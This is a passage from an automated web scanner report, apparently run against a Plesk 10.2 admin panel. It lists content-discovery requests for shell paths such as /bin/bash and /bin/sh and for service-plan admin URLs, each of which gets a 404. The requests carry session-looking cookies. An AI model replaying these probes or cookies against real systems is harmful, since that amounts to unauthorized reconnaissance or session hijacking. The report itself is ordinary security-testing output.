User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.72. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/bash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/bash

Request

GET /bin/bash HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.73. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/csh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/csh

Request

GET /bin/csh HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.74. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/false  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/false

Request

GET /bin/false HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.75. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/rbash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/rbash

Request

GET /bin/rbash HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.76. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/sh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/sh

Request

GET /bin/sh HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.77. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/bin/tcsh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /bin/tcsh

Request

GET /bin/tcsh HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:43:03 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.78. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/

Request

GET /customer-service-plan/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.79. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/create

Request

GET /customer-service-plan/create HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.80. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/create-addon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/create-addon

Request

GET /customer-service-plan/create-addon HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.81. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/delete/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/delete/

Request

GET /customer-service-plan/delete/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:47 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.82. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/edit/

Request

GET /customer-service-plan/edit/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:00 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.83. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/edit/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/edit/id/

Request

GET /customer-service-plan/edit/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:24:48 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.84. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/customer-service-plan/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /customer-service-plan/list

Request

GET /customer-service-plan/list HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5
